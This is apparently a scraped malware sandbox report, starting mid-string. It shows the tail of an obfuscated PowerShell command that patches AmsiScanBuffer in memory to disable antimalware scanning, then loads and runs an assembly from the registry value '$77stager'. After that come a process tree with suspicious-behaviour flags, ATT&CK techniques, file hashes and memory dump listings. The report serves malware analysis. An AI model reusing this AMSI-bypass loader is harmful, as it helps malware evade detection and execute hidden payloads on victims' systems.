r](82)+'un'+'t'+'im'+'e'+''+','+'M'+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$DfakNndwyPK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+'V'+''+'i'+'rtu'+'a'+'l',$VuxHBlLMlw,$CXiJXfVxnkdRml).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+',M'+[Char](97)+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $DfakNndwyPK.CreateType();}$waskEbzTPtUNn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+'e'+'m'+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+'f'+'t'+''+'.'+''+'W'+'i'+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+[Char](115)+''+'a'+''+'f'+''+'e'+'Na'+'t'+''+'i'+''+'v'+''+'e'+'M'+[Char](101)+'t'+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$NpcZZoKdDOoebt=$waskEbzTPtUNn.GetMethod(''+'G'+'e'+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+'d'+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+''+'S'+'t'+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ugOEbBiWAhFGOeacujA=axylMltnpBep @([String])([IntPtr]);$lWgPbiiipEWoIthNRTnKvp=axylMltnpBep @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UnpskIbieQE=$waskEbzTPtUNn.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$IJdOrPdYiSFhDw=$NpcZZoKdDOoebt.Invoke($Null,@([Object]$UnpskIbieQE,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$JfvaoopxDKNVKXRIX=$NpcZZoKdDOoebt.Invoke($Null,@([Object]$UnpskIbieQE,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+'t'+'')));$jTgnQTX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IJdOrPdYiSFhDw,$ugOEbBiWAhFGOeacujA).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+'l'+'');$DsFyAWBNMmRMPMhSV=$NpcZZoKdDOoebt.Invoke($Null,@([Object]$jTgnQTX,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$voYJXCfEms=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JfvaoopxDKNVKXRIX,$lWgPbiiipEWoIthNRTnKvp).Invoke($DsFyAWBNMmRMPMhSV,[uint32]8,4,[ref]$voYJXCfEms);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DsFyAWBNMmRMPMhSV,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JfvaoopxDKNVKXRIX,$lWgPbiiipEWoIthNRTnKvp).Invoke($DsFyAWBNMmRMPMhSV,[uint32]8,0x20,[ref]$voYJXCfEms);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2728

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:1148

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:3788

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:3852

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:4600

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:3684

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:5068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1300

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1876

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1940

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1376

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2580

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2824

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3352

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3452

C:\Users\Admin\AppData\Local\Temp\133fda00a490e613f3a6c511c1c660eb.exe
"C:\Users\Admin\AppData\Local\Temp\133fda00a490e613f3a6c511c1c660eb.exe"
2⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052

C:\Users\Admin\AppData\Local\Temp\$774c65ac
"C:\Users\Admin\AppData\Local\Temp\$774c65ac"
3⤵
- Executes dropped EXE
PID:2204

C:\Users\Admin\AppData\Local\Temp\$77d7e828
"C:\Users\Admin\AppData\Local\Temp\$77d7e828"
3⤵
- Executes dropped EXE
PID:1352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 308
4⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 312
4⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3572

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3764

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4160

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4520

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3448

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:2332

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4248

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4448

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3292

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2772

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1352 -ip 1352
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1352 -ip 1352
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1852

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9E.tmp.csv
Filesize
34KB

MD5
7a1d8b9bc872d536c99c49fc81b39aab

SHA1
fb67a4ca4dbe30de3cbabf33e75aeec1f980f65c

SHA256
11ed79541da28d682c93af5d1b6f89275d91d96f50e12064ce9cd17b8c89337f

SHA512
8b3c3e80657fac93ef72d9588ec3a4a4aec38fd95c4087012494095b93db39922b62dcffbf58bcdeaf2604c7e6b3444c50af1be29e5002d8a351781c0b20fe6e

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERABE.tmp.txt
Filesize
13KB

MD5
4ac3d9ef61e234f69c14786c2d8b90b3

SHA1
238f18f2a77f1db5cd2bb7c8d81b2fe28cd08069

SHA256
b859584d5c1b2cc5e4df19d4defab0ffd987671a18c717f55d5562377f07316d

SHA512
5a7fbc03af0bc8f8bf90659e3473fe13e8654651b4b80f738261336100939340428f33edff3edbdf833584e3c42d44cdccaf5c4af5b86e867cfaee7fb775ceb3

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD8.tmp.csv
Filesize
34KB

MD5
410ecd12129c57f399cb89f57f26472d

SHA1
34a42ca1d550a78a9820c381014c5c28a2fecefd

SHA256
441dc75ae1b9b65dd73ad4db78e9d29501dfce4be6ed993fcdd0ecacb8a190cd

SHA512
aee83b4cecbb33e50f083aa54f91a113865be0d9483aee52fac03c7940e6ece04cef4d9210e3eb05a5dd7ded8b29ed316c6ecd2ab873772a0c51e428e6aa49e1

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE9.tmp.txt
Filesize
13KB

MD5
9b79b44a0c52afd118510f24b1dc929a

SHA1
27b7b56e860b2d6150a24f2ff0183079a682663e

SHA256
8575ddbec3278573f891ded85d5d68539edafb1361d198dd34140140daa3e0be

SHA512
ad12be1ec48d0f3b3467aed6f4a4f4e515258f028b3e1497847698b3fb92c8590fbf54bca0f81305f816e93b69dc0749280c42909b347f562abe0f131684661f

Download Submit
C:\Users\Admin\AppData\Local\Temp\$774c65ac
Filesize
4.5MB

MD5
133fda00a490e613f3a6c511c1c660eb

SHA1
e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

SHA256
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

SHA512
f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_dbzrlniu.mhw.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/400-5893-0x00000202DED30000-0x00000202DED55000-memory.dmp

Filesize
148KB

Download
memory/400-4999-0x00000202DED30000-0x00000202DED55000-memory.dmp

Filesize
148KB

Download
memory/616-4946-0x0000015086780000-0x00000150867A5000-memory.dmp

Filesize
148KB

Download
memory/616-4947-0x00007FFFF6DCD000-0x00007FFFF6DCE000-memory.dmp

Filesize
4KB

Download
memory/684-4959-0x00007FFFF6DCF000-0x00007FFFF6DD0000-memory.dmp

Filesize
4KB

Download
memory/964-4985-0x00007FFFF6DCC000-0x00007FFFF6DCD000-memory.dmp

Filesize
4KB

Download
memory/964-4984-0x000001E84DB90000-0x000001E84DBB5000-memory.dmp

Filesize
148KB

Download
memory/964-5892-0x000001E84DB90000-0x000001E84DBB5000-memory.dmp

Filesize
148KB

Download
memory/2204-4898-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2728-5226-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

Filesize
10.8MB

Download
memory/2728-4913-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

Filesize
10.8MB

Download
memory/2728-4914-0x000001D702610000-0x000001D70263A000-memory.dmp

Filesize
168KB

Download
memory/2728-4912-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

Filesize
10.8MB

Download
memory/2728-4911-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

Filesize
10.8MB

Download
memory/2728-4910-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

Filesize
10.8MB

Download
memory/2728-4900-0x000001D766910000-0x000001D766932000-memory.dmp

Filesize
136KB

Download
memory/2728-4899-0x00007FFFD7743000-0x00007FFFD7745000-memory.dmp

Filesize
8KB

Download
memory/4052-44-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-26-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-58-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-56-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-54-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-68-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-65-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-60-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-12-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-10-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-8-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-18-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-16-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-14-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-5-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-4885-0x00000000745D0000-0x0000000074D80000-memory.dmp

Filesize
7.7MB

Download
memory/4052-4886-0x00000000745D0000-0x0000000074D80000-memory.dmp

Filesize
7.7MB

Download
memory/4052-4888-0x0000000006B30000-0x0000000006B7C000-memory.dmp

Filesize
304KB

Download
memory/4052-4887-0x0000000006A50000-0x0000000006ACE000-memory.dmp

Filesize
504KB

Download
memory/4052-4889-0x00000000745DE000-0x00000000745DF000-memory.dmp

Filesize
4KB

Download
memory/4052-4890-0x00000000745D0000-0x0000000074D80000-memory.dmp

Filesize
7.7MB

Download
memory/4052-62-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-25-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-67-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-32-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-41-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-42-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-0-0x00000000745DE000-0x00000000745DF000-memory.dmp

Filesize
4KB

Download
memory/4052-28-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-30-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-38-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-46-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-48-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-50-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-52-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-37-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-34-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-20-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-5747-0x0000000006C80000-0x0000000006CD4000-memory.dmp

Filesize
336KB

Download
memory/4052-5768-0x00000000745D0000-0x0000000074D80000-memory.dmp

Filesize
7.7MB

Download
memory/4052-22-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-6-0x0000000006590000-0x00000000067CA000-memory.dmp

Filesize
2.2MB

Download
memory/4052-4-0x0000000006870000-0x0000000006902000-memory.dmp

Filesize
584KB

Download
memory/4052-3-0x0000000006D80000-0x0000000007324000-memory.dmp

Filesize
5.6MB

Download
memory/4052-2-0x0000000006590000-0x00000000067D0000-memory.dmp

Filesize
2.2MB

Download
memory/4052-1-0x00000000004C0000-0x0000000000946000-memory.dmp

Filesize
4.5MB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads